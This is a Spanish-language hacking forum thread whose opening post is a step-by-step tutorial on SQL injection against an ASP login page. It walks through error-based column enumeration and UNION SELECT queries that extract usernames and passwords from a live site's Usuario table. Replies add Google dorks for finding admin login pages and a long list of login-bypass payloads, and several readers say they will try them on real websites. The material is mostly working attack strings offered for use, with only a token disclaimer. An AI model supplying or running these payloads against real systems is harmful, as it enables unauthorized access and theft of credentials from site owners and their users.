Inyección SQL a Login ASP

Iniciado por Stuxnet, Marzo 10, 2013, 11:13:28 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Marzo 10, 2013, 11:13:28 PM Ultima modificación: Junio 13, 2013, 06:44:26 PM por Stuxnet

Bien comencemos, para este tutorial utizare la página de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Este tutorial es con fines educativos y no me hago responsable del uso que le den.

En el en campo "Clave de Acceso" y "Password" del login escribimos:

Código: php
' having 1= 1--



Al hacerlo nos dara el seguiente error:


Sabemos que es vulnerable y nos acaba de dar el nombre de la tabla y la columna "Usuario.Clave, teniendo esto regresamos a nuestro login y escribimos:

Código: php
' group by Usuario.Clave having 1 = 1--


Hacemos la inyección y el siguiente error sera así:


Nos acaba de dar el nombre de la tabla y la columna "Usuario.Nombre", teniendo esto regresamos a nuestro login y escribimos:

Código: php
' group by Usuario.Clave, Usuario.Nombre having 1=1--


Hacemos la inyección y el siguiente error sera así:


Nos acaba de dar el nombre de la tabla y la columna "Usuario.Clave_de_Acceso", teniendo esto regresamos a nuestro login y escribimos:

Código: php
' group by Usuario.Clave, Usuario.Nombre, Usuario.Clave_de_Acceso having 1=1--


Hacemos la inyección y el siguiente error sera así:


Nos acaba de dar el nombre de la tabla y la columna "Usuario.Password", teniendo esto regresamos a nuestro login y escribimos:

Código: php
' group by Usuario.Clave, Usuario.Nombre, Usuario.Clave_de_Acceso, Usuario.Password having 1=1--


Hacemos la inyección y el siguiente error sera así:


Nos acaba de dar el nombre de la tabla y la columna "Usuario.Tipo_de_Usuario", teniendo esto regresamos a nuestro login y escribimos:

Código: php
' group by Usuario.Clave, Usuario.Nombre, Usuario.Clave_de_Acceso, Usuario.Password, Usuario.Tipo_de_Usuario having 1=1--


Hacemos la inyección y el siguiente error sera así:



Nos acaba de dar el nombre de la tabla y la columna "Usuario.Tunto_de_Captura", teniendo esto regresamos a nuestro login y escribimos:

Código: php

' group by Usuario.Clave, Usuario.Nombre, Usuario.Clave_de_Acceso, Usuario.Password, Usuario.Tipo_de_Usuario, Usuario.Punto_de_Captura having 1=1--


Hacemos la inyección y el siguiente error sera así:


Nos acaba de dar el nombre de la tabla y la columna "Usuario.ESTATUS", teniendo esto regresamos a nuestro login y escribimos:

Código: php
' group by Usuario.Clave, Usuario.Nombre, Usuario.Clave_de_Acceso, Usuario.Password, Usuario.Tipo_de_Usuario, Usuario.Punto_de_Captura, Usuario.ESTATUS having 1=1--


Como podemos observar al hacer esto nos dira "clave de acceso y/o password incorrectos" esto quiere decir que hemos terminado de buscar las tablas y columnas.


Nuestra siguiente inyección sera de esta forma:

Código: php
' union select 1,1,1,1,1,1,min(Clave_de_Acceso) from Usuario where Clave_de_Acceso > 'a'--


Esta parte tenemos 6 unos y min(LOGIN) es la posición al hacer la inyección les arroja los datos.

La posión de los unos puede varia un ejemplo podría ser:

Código: php
' union select 1,1,1,1,min(Clave_de_Acceso)1,1 from Usuario where Clave_de_Acceso > 'a'--



Curiosamente al hacer la inyección de esta forma tenemos el acceso:

Código: php
' union select 1,1,1,1,1,1,min(Password) from Usuario where Clave_de_Acceso > 'ADMIN'--




La inyección para que les arroje la password es:

Código: php
' union select 1,1,1,1,1,1,min(Password) from Usuario where Password > 'ADMIN'--


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Buen post. Traté con una web y al momento de usar

Código: php
' union select 1,1,1,1,min(xxxx) from yyyyy where xxxx > 'a'--


Al poner ese código (con los respectivos datos), no puedo acceder (el número de columnas es correcto, o sino sale un error). Simplemente carga de nuevo el login. No me da el error que aparece ahí. También probé en cambiar el min(xxxx) a todas las posiciones de los 1's y nada. ¿Alguna idea?

jojo! gracias por compartir.

ahora toca probar.!

Execelente tuto, desde ya a ponerlo en practica xD

Marzo 12, 2013, 05:01:45 PM #4 Ultima modificación: Marzo 12, 2013, 05:05:12 PM por k43l
existen otras consultas sql que le puedes meter a los campos de texto para bypassear y en este caso se esta descubriendo solamente los campos de una sola tabla y no de varias como mencionas, la tabla seria "Usuario", queria hacer esa aclaración
salu2




"Mess with the best, die like the rest"

Prueba con esto :
                           user:'1 or '1'='1
                            password:'1 or '1'='1

Marzo 30, 2013, 04:23:39 PM #6 Ultima modificación: Marzo 30, 2013, 04:27:43 PM por OverHoax
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Prueba con esto :
                           user:'1 or '1'='1
                            password:'1 or '1'='1

Esa Sentencia Es Muy Conocida Se Puede Usar Con El Dork De Google

inurl :admin login.asp
inurl :admin.asp

Tambien Funciona

username: admin
password: 'or''='

S2
Nunca rechaces aquellos que te aman o se preocupan por ti. Porque algún día entenderás que perdiste la luna mientras contabas las estrellas

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Prueba con esto :
                           user:'1 or '1'='1
                            password:'1 or '1'='1

Esa Sentencia Es Muy Conocida Se Puede Usar Con El Dork De Google

inurl :admin login.asp
inurl :admin.asp

Tambien Funciona

username: admin
password: 'or''='

S2


Citaradmin'--
' OR ''='
'or'
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
- ' or 'x'='x
- ' or 'x'='x
'or'1 ou 'or''='
' or 'x'='x
admin' or 1==1
' OR "='
'or'1'='1

Saludos.
Si Me buscas , Me encontraras.........